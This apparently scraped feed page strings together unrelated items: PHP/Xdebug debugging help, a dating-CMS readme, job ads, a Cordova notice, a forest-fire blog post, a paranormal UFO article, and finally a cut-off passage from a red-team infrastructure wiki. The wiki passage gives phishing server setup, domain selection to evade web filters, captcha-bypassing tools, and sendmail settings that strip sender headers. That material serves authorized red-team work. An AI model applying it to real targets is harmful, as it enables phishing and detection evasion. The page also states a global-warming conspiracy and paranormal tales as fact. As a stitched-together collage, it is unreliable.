code="1"><message><![CDATA[parse error in command]]></message></error></response> <- run -i 4 -> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="run" transaction_id="4" status="stopping" reason="ok"></response> Log closed at 2013-06-23 21:42:04

For completeness, here's the xdebug section of my php.ini file ...

[xdebug] zend_extension = c:\wamp\bin\php\php5.3.13\ext\php_xdebug-2.2.3-5.3-vc9-x86_64.dll ;xdebug.remote_enable = off ;xdebug.profiler_enable = off ;xdebug.profiler_enable_trigger = off ;xdebug.profiler_output_name = cachegrind.out.%t.%p ;xdebug.profiler_output_dir = "c:/wamp/tmp" xdebug.remote_enable=1 xdebug.remote_host="localhost" xdebug.remote_port=9000 xdebug.remote_handler="dbgp" xdebug.remote_log=C:\wamp\bin\apache\apache2.2.22\logs\xdebug.log xdebug.remote_mode=req xdebug.profiler_enable=1 xdebug.profiler_output_dir="c:/wamp/tmp/" xdebug.collect_params=On xdebug.show_local_vars=On

... and the Sublime Text project file.

{ "folders": [ { "path": "/C/Users/work/My Projects/ElseApps/EAFF/code" } ], "settings": { "xdebug": { "url": "http://localhost:8080" } }

Sublime Text's status bar shows the following message after I click Start debugging and the page slowly loads:

Xdebug: Page finished executing. Reload to continue debugging.

Can anyone spot where I'm going wrong, or advise a useful path to diagnosing the problem?

The cause does appear to be the space in the path passed to Xdebug by Sublime Text's Xdebug package. The original query ...

<- breakpoint_set -i 3 -n 18 -t line -f file://C:\Users\work\My Projects\ElseApps\EAFF\code\approot\core\etc\eaff-index.php

... results in an error response ...

-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="3"><error code="1"><message><![CDATA[parse error in command]]></message></error></response>

... but a quick and nasty hack of the python source file (my first ever Python edit) sends this ...

<- breakpoint_set -i 1 -n 18 -t line -f file://C:\Users\work\MyProj~1\ElseApps\EAFF\code\approot\core\etc\eaff-index.php

... and gets this back ...

-> <response xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" command="breakpoint_set" transaction_id="1" id="39480001"></response>

... after which everything works as designed.

The short-term hack used to test this is at line 221 in Xdebug.py:

def uri(self): rawpath = os.path.realpath(self.view.file_name()) outpath = rawpath.replace("My Projects", "MyProj~1") # return 'file://' + os.path.realpath(self.view.file_name()) return 'file://' + outpath

I'll investigate further. I'd already deliberately set the 8.3 pathname in the Sublime Text project file, but that's not what's passed to Xdebug. If it were, there should be no problem.


          Free Open Source Online Dating Software      Cache   Translate Page   Web Page Cache   
pH7 Social Dating CMS The Most Secure, Powerful & Professional Social Dating Web App Builder

pH7 Social Dating CMSis a Professional & Open Source Social Dating CMS, fully responsive design, low-resource-intensive, powerful and very secure.

pH7CMS (now known as pH7Builder) is included with 35 modules and based on its homemade framework (pH7Framework). It is also the first Professional, Free and Open Source Social Dating Site Builder Software and the first choice for creating enterprise level Dating Apps/Service or social networking sites.


Free Open Source Online Dating Software
Software Overview

pH7 Dating CMSis a Social/Dating CMS written in Object-Oriented php ( OOP ), fully compatible and highly optimised for PHP 7+ and based on MVC architecture (Model-View-Controller).

It is designed with the KISS principle in mind, and the all source code can be read and understood in minutes. For a better flexibility, the software uses PDO (PHP Data Objects) abstraction which allows the choice of the database. The principle of development is DRY (Don't Repeat Yourself) aimed at reducing repetition of information of all kinds (no duplicate code).

This Free and Open Source Social Dating Site Builder wants to be low resource-intensive, powerful, stable and secure. The software also comes with 35 system modules and is based on pH7Framework (written specifically for this project) that has over 52 packages.

To summarize, pH7CMS gives you the perfect ingredients to create the best online dating service or social networking website on the World Wide Web!

How Powerful Your Social-Dating App Will Be? :rocket: Best Dating Features Advanced Search Blog Notes Pages Management Friends/Mutual Friends, Visit, Messages, Instant messaging, Views, Like, Rating, Smileys, Geo Map, Avatar, Wallpaper, ... Related Profiles (for better user experience and faster match) Custom Profile (Background profile) Comments Hot or Not Love Calculator Matchmaking System Geo-Location People Nearby Photo Albums Videos (and possibility to upload videos from API v3 YouTube, Vimeo, Metacafe and Dailymotion) Forums Full Moderation of all contents posted by your users Nudity Filter Option for all images uploaded by users Dating Scammer Detector (see if profile photos aren't used by scammers) Anti-Scam Tools Watermark Branding Chat Rooms Chatroulette Games (with high quality and viral games installed) Webcam Shot Affiliate Newsletter Activity Streams User Mentions (using the “@” symbol with the username such as @pH-7 ) Member Approval System Advanced Admin Panel Complete Membership System Payment Gateways Integration for PayPal, Stripe, Braintree, Bitcoin and 2CheckOut Statistics & Analytics System Live Notification System Registration delay (to avoid spam) File Management Dynamic Field Forms Management Privacy Settings Banner/Advertisement Management User Dashboard Dating-Style Profile Page Fake Profile Generator CSV User Importer Support for Multiple Languages, Internationalization and Localization (I18N) European and American Time/Date formats Cache system for the database, pH7Tpl (our template engine), static files (HTML, CSS, JS), string content, ... Maintenance Mode Database Backup Report Abuse SEO-Friendly (Title, Content, Code, ...), Sitemap module, hreflang , possibility to translate each URL, ... Multilingual URLs Check that all UGC (User-Generated Content) are Unique (to avoid spam and malicious users) RSS Feed Block easily any IPs, emails, usernames, affiliated bank accounts, etc. Country Blocker (block easily any countries where you don't want your website to be accessible) Country Restrictions for Member and Affiliate registration forms Fully API for integration from an external app (iOS/Android, ...), website, program, ... Feedback Fully Responsive Templates Memberships/Groups Manager Publishable easily into Android/iPhone/iOS webview mobile app thanks its Mobile-Optimized Templates Multiple-Themes and many customization possible Message templates Multi Themes and many personalizable Includes top html5 features Allow to sign in to your site with Facebook, Google and Twitter thanks pH7CMS's Connect module Invite Friends Social Bookmark (Social Media Sharing Buttons) Powerful Anti-Spam System Full Security system against XSS, CSRF, SQL injection, authentication hacking, session fixation, brute-force, reverse tabnabbing phishing attacks, ... and can even prevent some DDoS attacks! Two-Factor Authentication Option available for Admins, Users and Affiliates Admin Panel - Block Access with IP Restriction Beautiful Code: Very thoroughly commented about what's happening throughout the PHP code, beautiful indentation and very readable, even for non-programmers Anyone can easily contribute to pH7CMS project thanks the GitHub repository

It's not a hazard that pH7CMS is considered to be the first choice for creating an enterprise level dating web app or social networking website

Great features like here and many other unique and exclusive features are waiting for YOU. Already released in pH7CMS!


Free Open Source Online Dating Software
Requirements

Application ServerPHP 5.6 or higher (Recommended Version: PHP 7.0.4 or higher).

Databasemysql/MariaDB 5.0.15 or higher.

Operating Systemlinux/Unix (Red Hat, CentOS, Debian, FreeBSD, Mandrake, Mac OS, etc.), windows.

Web ServerApache with mod_php or with PHP in CGI, FastCGI mode (nginx, LiteSpeed and IIS should also work. You might have to change some pieces of code and change the URL rewriting to make it work).

URL rewriting extension module Apache , nginx, LiteSpeed, IIS (for Web.config, you have a good tutorial here ).

Specific RequirementServer has to be connected to Internet.

Minimum Web Space2.0 GB

pH7CMS's Video Module Requirement (only if enabled) FFmpeg

Installation Github: Clone pH7CMS from Github git clone git@github.com:pH7Software/pH7-Social-Dating-CMS.git Install Composer From a command line opened in the folder, run composer install to install pH7CMS's dependencies. Composer: Install Composer composer create-project ph7software/ph7cms --prefer-dist ph7cms Sourceforge: Directly download the latest stable version from Sourceforge . Softaculous: If your Web host offers Softaculous, you might be able to install pH7CMS in one-click with Softaculous . Nginx Configuration

In order to get pH7CMS working on nginx server, you need to add some custom nginx configuration.

Create /etc/nginx/ph7cms.conf and add the following:

location / { try_files $uri $uri/ /index.php?$args; index index.php; }

Please note that the above code is the strict minimum and obviously you can add more rules by comparing with the main Apache .htaccess file .

Finally, in your nginx server configuration, you will have to include ph7cms.conf file to complete the configuration like below:

In file, e.g., /etc/nginx/sites-enabled/yoursite.conf for Ubuntu and other OS based on Debian or /etc/nginx/conf.d/yoursite.conf for CentOS and other OS based on Red Hat.

server { # Port number. In most cases, 80 for HTTP and 443 for HTTPS listen 80; server_name www.yoursite.com; root /var/www/ph7cms_public_root; index index.php; #you can use index.ph7; for hidding the *.php ... client_max_body_size 50M; error_log /var/log/nginx/yoursite.error.log; access_log /var/log/nginx/yoursite.access.log; # Include ph7cms.conf. You can also directly add the "location" rule instead of including the conf file include /etc/nginx/ph7cms.conf; }

For more information, please refer to the nginx documentation.


Free Open Source Online Dating Software
Translations

You can find and add other languages on the I18N repo .

Author

Coded & Designed with lots of :heart: by Pierre-Henry Soria . A passionate Belgian software engineer :chocolate_bar: :beer:

Hire Me At Your Company?

Do you need someone like me (and willing to relocate) at your company..? Let's chat together !

Official Website

pH7CMS.com

Documentation

pH7CMS Documentation

Contributing
Free Open Source Online Dating Software

Anyone can contribute on pH7CMS GitHub repository!

Finding bugs, improving the CMS/doc or adding translations. Any contribution is welcome and highly appreciated!

Just clone the repository, make your changes and then make a push ;-)

WARNING, your code/modification must be of excellent quality and follow the Code Convention and PSR . I manually validate all the improvements and changes.

You will also become a pH7CMS VIP member and get all exclusive premium contents and upcoming modules.


Free Open Source Online Dating Software
Tools/Software Used to Develop pH7CMS

LAMP on Fedora/Ubuntu (and Windows/Mac with WampServer/MAMP for testing purpose)

Geany & Sublime Textfor coding the whole project. That's it! However, since pH7CMS 5.0, PhpStorm (and sometimes Atom) are used as well.

GIMPfor editing the assets, etc.

Trimage(and ImageOptim when developing on Mac) for compressing & optimizing the images

Poeditfor translating the Gettext files

FileZillafor FTP client

Gitfor the version control system

Sometimes, when working on Mac, Sequel Pro is used to lookup easily at a database.

Contact

You can send me an email for any suggestions or feedback at: hello {AT} ph7cms {D0T} com OR hi {AT} ph7 {D0T} me

pH7CMS; The Eco-Friendly CMS :heart:
Free Open Source Online Dating Software

pH7CMS has been built to reduce the power and CPU usage of your server in order to preserve the nature and help to save our environment.

pH7CMS's templates also use lighter colors since LCD monitors use less electricity to display them.

Finally, please consider using green Web hosting (which use Green Power supply).

-> Other 10 Easy Ways to Green Your Social Community :wink: <-

License

pH7CMSis under Open Source Free License.

License: General Public License 3 or later; See the PH7.LICENSE.txt and PH7.COPYRIGHT.txt files for more details.


Free Open Source Online Dating Software
Free Open Source Online Dating Software

          Global EDA Software Market Analysis 2018 | Growth by Top Companies: Cadence USA, Mentor Graphics USA, ALTIUM Australia, ZUKEN Japan, Synopsys USA, Magma Design Automation USA, Agilent EEsof USA, SpringSoft China Taiwan, ANSYS USA, Apache Design Solutions       Cache   Translate Page   Web Page Cache   
(EMAILWIRE.COM, August 09, 2018 ) The global market size of EDA Software is $XX million in 2017 with XX CAGR from 2013 to 2017, and it is expected to reach $XX million by the end of 2023 with a CAGR of XX% from 2018 to 2023. Download Free Sample at. https://www.researchreportsinc.com/sample-request?id=67608...
          Unable to access localhost or phpMyAdmin with WAMP      Cache   Translate Page   Web Page Cache   

I'm running Apache v2.2.21, php v5.38, and mysql v5.5.16. The WAMP icon is green.

As the post title says, I can't access either localhost or phpMyAdmin from the WAMP systray icon menu, nor can I by typing http://127.0.0.1/index.php in a browser.

Clicking on either localhost or phpMyAdmin gives me the error message "Unable to connect - Firefox can't establish a connection to the server at 127.0.0.1."

I do have Skype and I know there are issues with Skype and WAMP port conflicts, so I quit Skype, and tried it, but got the same results.

At first the WAMP icon was always orange, but some searching here revealed that changing the listening port to 8080 (the default is 80) in httpd.conf. That got the orange icon to go green.

Fixed it.

The last paragraph in my post was the key: I went into Skype and unchecked the "Use port 80 and 443 as alternatives for incoming connections." Then I went back into the httpd.conf file and changed "Listen 8080" back to the original "Listen 80".

Now both Skype and WAMP work properly.


          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Breaking changes coming to the iOS WebView in Apache Cordova      Cache   Translate Page   Web Page Cache   

Uh oh.


Breaking changes coming to the iOS WebView in Apache Cordova - Apache Cordova

------------------------------------
Limitations of WKWebView

 

There are many limitations of WKWebview, especially if you were using UIWebView previously. The limitations are:

  1. Cookies don't persist. This is a WebKit bug, but someone has created a plugin for a workaround. See CB-12074
  2. Can't delete cookies. This is/was a WebKit bug (2015), we need to test for the iOS 11/12. See CB-11297
  3. Can't execute JavaScript code in the background. There are several issues related to this. See CB-12815
  4. XmlHttpRequests don't work, because of Cross-Origin Resource Sharing issue (CORS). There is a workaround plugin created by Oracle (UPL licensed, which is Apache-2.0 compatible). See CB-10143
  5. Migration of localStorage from UIWebView. There is a migration plugin available. See CB-11974
  6. iframes will not be supported any longer (they are now CORS restricted in WKWebView), and may be partially or completely broken. This may lead to incompatibilities with the same code in other Cordova platforms.
  7. Known issues with WKWebView on iOS pre-11 which will be deprecated and dropped in a future Cordova release

There are several bugs that need to be resolved as well. The full list here: https://s.apache.org/QfsF

As you can see, WKWebView is not a direct drop-in replacement for UIWebView, you will need several plugins to patch functionality that is missing. There is also the local-webserver experimental plugin option, which will not be graduated to a full plugin -- we will concentrate our efforts on supporting the main WKWebView engine plugin.

Hopefully with more testing, and filing of bug reports with Apple for missing features, the WKWebView can be a full replacement for Cordova users.


          Developer - JM Group - Montréal, QC      Cache   Translate Page   Web Page Cache   
Digital : Apache Spark, Digital : Scala Database DB2, Sybase or Oracle SDLC, & AGILE Desired Skills Front office back office report experience Order Mgmt...
From JM GROUP - Mon, 30 Jul 2018 17:28:22 GMT - View all Montréal, QC jobs
          Forest fires in history      Cache   Translate Page   Web Page Cache   
I lived in New Mexico when that state had several terrible fires, including the one that almost burnt the city of Los Alamos.

Luckily it spared us that time (a fire a few years earlier burnt a canyon nearby) but I was bemused to see signs: No smoking outdoors (they allowed smoking inside only).

So my sympathy is with those in the California fires.  Expect lots of finger pointing for blame, but short of stopping people from living in forested areas, there is not much you can do.

Burning off the underbrush helps (unlike eastern forests, the dead wood seems to sit there and doesn't rot for years, probably because it is dry). However, the Los Alamos fire was caused by a fire started to burn off the underbrush to stop a future fire: they miscalculated.

Our local Apache tribe had trained firefighters that would go out every year to fight fires. They would start training early in the year, and often would be called up for months. We didn't lose any firefighters when I was there; but they often came back with the worse case of fungus toes due to sweating feet inside their boots.

And some of our fighters were young women: but if you know Apache history, you don't mess with Apache women.

If you leave the forest burn, locals will complain, but this is how forests renew themselves: new trees and plants will come up. IF you stop the fires, then that means a hotter larger fire next time.

However, the largest fire in the west was in 1910: the Devil's Broom fire that included northern Idaho and surrounding states and killed 87 people.

the National Park Service site has a list of major recorded fires, mostly in the USA.

the worst fire on their list was the Peshtigo Wisconsin fire in 1871, which killed almost 1200 people. Few people heard about it, because it happened the same time as the great Chicago fire.

Wikipedia has a list of fires worldwide.

In many places, old dry grass is burnt off so that the new tender grass will sprout, or so farmers can plant crops more easily.  The farmers in Africa did this when they moved to a new field (after the older fields became exhausted) and the Native Americans also set fire to clear the grass. Ditto for Asia. But usually these fires are started when rain will limit the damage (at the start of the rainy season, when planting is done) and are more grass than forest fires.

Global warming will be blamed for all of this, and fingers pointed to Trumpieboy.

Yet the increase in global temperature has been going on for 100 years and Trumpie boy has only been in charge for 2.

And although the US refuses to bow and obey the NWO bosses who want to order people around, one tiny fact is that, unlike in Europe, the US carbon footprint has gone down in recent years, due to the use of natural gas from fracking.

yes, I support sustainable living. But the religion of global warming is to manipulate people into accepting a UN dictatorship that will tell you how to live for your own good (and maybe order you to die for the good of the world, although they usually hide that beneath fancy language).


          Junior Software Engineer - Leidos - Morgantown, WV      Cache   Translate Page   Web Page Cache   
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Leidos has job opening for a Junior Software Engineer in Morgantown, WV....
From Leidos - Wed, 25 Jul 2018 12:47:39 GMT - View all Morgantown, WV jobs
          Apache mode not working      Cache   Translate Page   Web Page Cache   
Hello, When I set the plugin to Apache mode, it does not work. It should write the rules to the htaccess file, but this is not happening.
          Mettre en ligne wamp 3.1.3      Cache   Translate Page   Web Page Cache   
Bonjour je souhaiterai mettre en ligne wamp 3.1.3 qui devra etre accessible depuis le net. Merci (Budget: €250 - €750 EUR, Jobs: Apache, PHP)
           "WHAT? ... ANOTHER CUBE?" -> THE TEXAS BLACK CUBES ... A 2nd PHOTO-      Cache   Translate Page   Web Page Cache   
The first picture of the appearance of an unidentified black cube over Texas.

 

"Another Cube..." 

The 2nd Black Cube photo

By Mary Alice Bennett

(Copyright 2015, Mary Alice Bennet - All rights Reserved)

<Edited by Robert D. Morningstar>

*******

Michael Nielson: -> "Another cube reportedly seen in Texas.  Its either the vanguard of the Borg assimilation fleet or its a kite flown by the Borgmans.  My question is simple:

 "Why would an advanced race of beings travel 100-trillion miles just to hover in the clouds over McAllen, Texas in their decidedly poorly aerodynamic cube?

Why not a sphere?

 Are they here for our spherical technology...or...the TexMex....?"

 

*******

The 1st "Black Cube" Photo.

The black color of this perfect cube reminds me of the color of mourners and the fact that was are missing our editor Dirk, is this phenomenon a tribute to him? The manifestation of the shape out of the atmosphere reminds me of the paranormal activities in Uintah, Utah at Skniwalker Ranch: Paranormal Corridor - Southwest USA by Mary Alice Bennett Skinwalker Ranch "Using infrared binoculars, a researcher in Utah was able to observe a large black animal crawling through a tunnel into our dimension. The ape-like creature moved along using its elbows. After exiting and sauntering off into the night, the anomalous yellow light which contained the tunnel, slowly faded away. This is but one of the events which occurred on the Skinwalker Ranch property while paranormal researchers were there. The tunnel appeared after a meditation session.

After another earlier attempt at meditating, an energy field was seen to swoop down upon the seated fellow. It uttered an animal roar as it sped by - the meditator was completely terrified. The researchers compared what they`d seen to the invisible force scene from the movie "Predator". Some of the other creatures who populate the Uintah Basin in N.E. Utah are only detectable because they block out the stars or by the enormous foot or claw prints that they leave behind. The rancher and his family had moved there in good faith, bringing their expensive herd of Angus cattle to the property. They lost so many cows there that they eventually had to leave, allowing the research team to take their place. Whatever is there does not allow domesticated livestock to pollute its sacred ground. Previous tenants had been warned not to try to dig anywhere on the land. In the 1770s the exploring Spanish had noticed underground activity there along with flying lights. The Ute tribe has 15 generations of tales to tell. There are deposits of the rare hydrocarbon Gilsonite on the ranch.

The UFO underground mining activity is similar to the situation in Pine Bush, New York. Large black flying triangles are seen in both areas. The rancher had seen a craft entering the atmosphere through a hole in the sky. At night he was able to see blue sky through one of these openings, as if it were the entrance to another world. There was another tunnel up there whose entrance opened directly opposite their homestead. Many of the sightings of anomalous creatures were one-time events, as if the animals were just passing through our dimension. When they first came to the land, the rancher`s wife was greeted at the gate by an oversized wolf that had to lean down in order to gaze into her car window. This sighting is reminiscent of the paranormal black dog of Norfolk, England which inspired the Sherlock Holmes mystery, "The Hound of the Baskervilles". "Black Shuck" as they call him, once appeared in a church, killing two people on his way out. The burn marks he left as he retreated are still visible on the doorway. There had been no repopulation of wolves to the Uinta region.

Soon after this encounter, the rancher`s wife observed what seemed to be an RV out in the field. There was a dark figure seated behind a desk inside. When he stood up, he took up the entire doorway. He was wearing a black helmet with a visor, black clothes and boots. The next day she and her husband went out to the field. When she saw the 18" bootprints he`d left behind, she became hysterical. The RV-type craft has also been seen in Brazil where they are called "chupas". These UFOs have been known to hunt the Amazonian hunters who wait in the trees at night for animals to pass by. A darting red light chased the horses off a cliff one night resulting in serious injuries. Sometimes the animals were seen to panic from the presence of invisible creatures.

The rancher advised the research team to stalk the phenomenon as if it were a wild animal.  He`d observed a multicolored craft one night which lit up the snow with its colorful lights.  When a twig broke, the craft turned off its lights and turned towards him.  The rancher thought that this was the type of reaction that one would expect from a living creature.  In Dulce, New Mexico, sightings of enormous UFOs are not uncommon.  One huge manta-ray shaped ship appeared to be covered with the skin of a sea creature.   It was grey, dimpled, and wrinkled.   A little ET was spotted with the same sort of skin.

Some theorize that the craft themselves are alive. This echoes the words of Ezekiel in his first chapter, the famous Biblical UFO encounter.  Ezekiel refers to the "wheel within a wheel" form of the "Throne of God" and to the "living creatures," which accompany the wheels flying in the sky.

The area of N.W. New Mexico is also famous for its suit-wearing "Wolfmen" and ghastly-faced " ghost runners," which have been known to keep pace with the patrol cars of the Highway Patrol.

How do you know whether it was a Bigfoot who raided your garden?

Answer: Only the fruit on the top of the tree is gone.

Last week, there was a sighting of a white Bigfoot up in Fort Apache, Arizona.  Since these animals are known to appear on or near Indian reservations, the news was not a surprise.  The author likes it noted that all of the examples used in this article were taken from the book "The Hunt for the Skinwalker", but the comparisons were not." (Available on Amazon).

 

The appearance of a large black Bigfoot from a conduit coming out of the sky in Utah is similar to the manifestation of the black cubes from the clouds over Texas.

"What is Gilsonite?"

"Gilsonite is a natural, resinous hydrocarbon found in the Uintah Basin in northeastern Utah; thus, it is also called Uintahite.  This natural asphalt is similar to a hard petroleum asphalt and is often called a natural asphalt, asphaltite, uintaite, or asphaltum.  Gilsonite is soluble in aromatic and aliphatic solvents, as well as petroleum asphalt.  Due to its unique compatibility,  Gilsonite is frequently used to harden softer petroleum products.  Gilsonite in mass is a shiny, black substance similar in appearance to the mineral obsidian.  It is brittle and can be easily crushed into a dark brown powder.  When added to asphalt cement or hot mix asphalt in production,  Gilsonite helps produce paving mixes of dramatically increased stability."

This dramatic event and this article memorializes for me our much esteemed and greatly missed editor Dirk. 

IN MEMORIAM: -> DIRK VANDER PLOEG, UFO DIGEST PUBLISHER, PASSES on JUNE 26TH, 2015

Mary Alice Bennett

July 27th, 2015

Extra information about the article: 
Some comparitive information concernig a recent paranormal phenomenon in the sky over Texas.
Categories: 

          Apache to Form Midstream Business in Deal With 'Blank-Check...      Cache   Translate Page   Web Page Cache   
 By Josh Beckerman 

Apache Corp. (APA) is forming Permian Basin midstream energy business Altus Midstream Co. via a deal with a blank-check company, contributing nearly all of its gathering, processing and transportation assets at the Alpine High formation in West Texas.

Kayne...

          ejecutar php desde terminal ubuntu      Cache   Translate Page   Web Page Cache   

ejecutar php desde terminal ubuntu

Respuesta a ejecutar php desde terminal ubuntu

con mi propia respuesta acabo de dar con el problema jajaja

hace algo mas de año y medio que migre toda la pagina a otro server y por defecto venia la php7.0 pero como me crasheaban algunas funciones de php, por no volverme loco actualizando el codigo de TODO el sitio, busque un comando para downgradear a la 5.6 y así hacer correr funciones "obsoletas" para php7 sobre el navegador, el caso es que el comando que utilicé (por lo que entiendo), solo servia para que apache b...

Publicado el 08 de Agosto del 2018 por stty

          Red-Team-Infrastructure-Wiki/README.md at master · bluscreenofjeff/Red-Team-Infrastructure-Wiki · GitHub      Cache   Translate Page   Web Page Cache   

This wiki is intended to provide a resource for setting up a resilient Red Team infrastructure. It was made to complement Steve Borosh (@424f424f) and Jeff Dimmock's (@bluscreenofjeff) BSides NoVa 2017 talk "Doomsday Preppers: Fortifying Your Red Team Infrastructure" (slides)

If you have an addition you'd like to make, please submit a Pull Request or file an issue on the repo.

THANK YOU to all of the authors of the content referenced in this wiki and to all who contributed!

Functional Segregation

When designing a red team infrastructure that needs to stand up to an active response or last for a long-term engagement (weeks, months, years), it’s important to segregate each asset based on function. This provides resilience and agility against the Blue Team when campaign assets start getting detected. For example, if an assessment’s phishing email is identified, the Red Team would only need to create a new SMTP server and payload hosting server, rather than a whole team server setup.

Consider segregating these functions on different assets:

  • Phishing SMTP
  • Phishing payloads
  • Long-term command and control (C2)
  • Short-term C2

Each of these functions will likely be required for each social engineering campaign. Since active incident response is typical in a Red Team assessment, a new set of infrastructure should be implemented for each campaign.

Using Redirectors

To further resilience and concealment, every back-end asset (i.e. team server) should have a redirector placed in front of it. The goal is to always have a host between our target and our backend servers. Setting up the infrastructure in this manner makes rolling fresh infrastructure much quicker and easier - no need to stand up a new team server, migrate sessions, and reconnect non-burned assets on the backend.

Common redirector types:

  • SMTP
  • Payloads
  • Web Traffic
  • C2 (HTTP(S), DNS, etc)

Each redirector type has multiple implementation options that best fit different scenarios. These options are discussed in further detail in the Redirectors section of the wiki. Redirectors can be VPS hosts, dedicated servers, or even apps running on a Platform-as-a-Service instance.

Sample Design

Here is a sample design, keeping functional segregation and redirector usage in mind:

Sample Infrastructure Setup

Further Resources

Perceived domain reputation will vary greatly depending on the products your target is using, as well as their configuration. As such, choosing a domain that will work on your target is not an exact science. Open source intelligence gathering (OSINT) will be critical in helping make a best guess at the state of controls and which resources to check domains against. Luckily, online advertisers face the same problems and have created some solutions we can leverage.

expireddomains.net is a search engine for recently expired or dropped domains. It provides search and advanced filtering, such as age of expiration, number of backlinks, number of Archive.org snapshots, SimilarWeb score. Using the site, we can register pre-used domains, which will come with domain age, that look similar to our target, look similar to our impersonation, or simply are likely to blend in on our target’s network.

expireddomains.net

When choosing a domain for C2 or data exfiltration, consider choosing a domain categorized as Finance or Healthcare. Many organizations will not perform SSL middling on those categories due to the possibility of legal or data sensitivity issues. It is also important to ensure your chosen domain is not associated with any previous malware or phishing campaigns.

The tool CatMyFish by Charles Hamilton(@MrUn1k0d3r) automates searches and web categorization checking with expireddomains.net and BlueCoat. It can be modified to apply more filters to searches or even perform long term monitoring of assets you register.

Another tool, DomainHunter by Joe Vest (@joevest) & Andrew Chiles (@andrewchiles), returns BlueCoat/WebPulse, IBM X-Force, and Cisco Talos categorization, domain age, alternate available TLDs, Archive.org links, and an HTML report. Additionally, it performs checks for use in known malware and phishing campaigns using Malwaredomains.com and MXToolBox. This tool also includes OCR support for bypassing the BlueCoat/WebPulse captchas. Check out the blog post about the tool's initial release for more details.

Yet another tool, AIRMASTER by Max Harley (@Max_68) uses expireddomains.net and Bluecoat to find categorized domains. This tool uses OCR to bypass the BlueCoat captcha, increasing the search speed.

If a previously-registered domain isn't available or you would prefer a self-registered domain, it's possible to categorize domains yourself. Using the direct links below or a tool like Chameleon by Dominic Chell (@domchell). Most categorization products will overlook redirects or cloned content when determining the domain's categorization. For more information about Chameleon usage, check out Dominic's post Categorisation is not a security boundary.

Finally, make sure your DNS settings have propogated correctly.

Categorization and Blacklist Checking Resources

Easy Web-Based Phishing

The words easy and phishing never really seem to go together. Setting up a proper phishing infrastructure can be a real pain. The following tutorial will provide you with the knowledge and tools to quickly setup a phishing server that passes "most" spam filters to-date and provides you with a RoundCube interface for an easy phishing experience including two-way communications with your target. There are many setup's and posts out there regarding phishing. This is just one method.

Once you have a domain that passes the proper checks listed in the previous section and have your phishing server spun-up, you'll need to create a couple "A" records for your domain as pictured.

DNS Setup

Next, ssh into your phishing server and make sure you have a proper FQDN hostname listed in your /etc/hosts. Example "127.0.0.1 email.yourphishingserver.com email localhost"

Now, you're going to install the web front-end to phish from in just a few easy steps. Start by downloading the latest "BETA" version of iRedMail onto your phishing server. Easy way is to right click the download button, copy the link address, use wget to download directly onto your phishing server. Next, untar it "tar -xvf iRedMail-0.9.8-beta2.tar.bz2". Navigate into the unpacked folder and make the iRedMail.sh script executable (chmod +x iRedMail.sh). Execute the script as root, follow the prompts, and you'll need to reboot to finish everything.

You'll want to make sure you have all the proper DNS records ponting to your mail server. (https://docs.iredmail.org/setup.dns.html). For DKIM, the new command should be "amavisd-new showkeys" to list your DKIM key.

For DMARC we can use (https://www.unlocktheinbox.com/dmarcwizard/) to generate our dmarc entry.

iRedMail Dashboard

Now, create a user to phish with.

iRedMail Create User

Login to the RoundCube interface with your new user and phish responsibly!

RoundCube Login

RoundCube Send Mail

Cobalt Strike Phishing

Cobalt Strike provides customizable spearphishing functionality to support pentest or red team email phishing. It supports templates in HTML and/or plaintext formats, attachments, a bounceback address, URL embedding, remote SMTP server usage, and per-message send delays. Another interesting feature is the ability to add a unique token to each user's embedded URL for click tracking.

Cobalt Strike Spearphishing Popup

For more detailed information, check out these resources:

Phishing Frameworks

Beyond rolling your own phishing setup or using a pentest or red teaming fraework, like Cobalt Strike, there are numerous tools and frameworks dedicated to email phishing. While this wiki won't go into detail about each framework, a few resources for each are collected below:

Gophish

Phishing Frenzy

The Social-Engineer Toolkit

FiercePhish (formerly FirePhish)

SMTP

“Redirector” may not be the best word to describe what we’re going to accomplish, but the goal is the same as with our other redirection. We want to remove any traces of our phishing origination from the final email headers and provide a buffer between the victim and our backend server. Ideally, the SMTP redirector will be quick to setup and easy to decommission.

There are two key actions we want to configure an SMTP redirector to perform:

Sendmail

Remove previous server headers

Add the following line to the end of /etc/mail/sendmail.mc:

define(`confRECEIVED_HEADER',`by $j ($v/$Z)$?r with $r$. id $i; $b')dnl

Add to the end of /etc/mail/access:

IP-to-Team-Server *TAB* RELAY
Phish-Domain *TAB* RELAY

Removing Sender’s IP Address From Email’s Received From Header

Removing Headers from Postfix setup

Configure a catch-all address

This will relay any email received to *@phishdomain.com to a chosen email address. This is highly useful to receive any responses or bounce-backs to a phishing email.

echo PHISH-DOMAIN >> /etc/mail/local-host-names

Add the following line right before //Mailer Definitions// (towards the end) of /etc/mail/sendmail.mc:

FEATURE(`virtusertable', `hash -o /etc/mail/virtusertable.db')dnl

Add the following line to the end of /etc/mail/virtusertable:

@phishdomain.com  external-relay-address

Note: The two fields should be tab-separated

Postfix

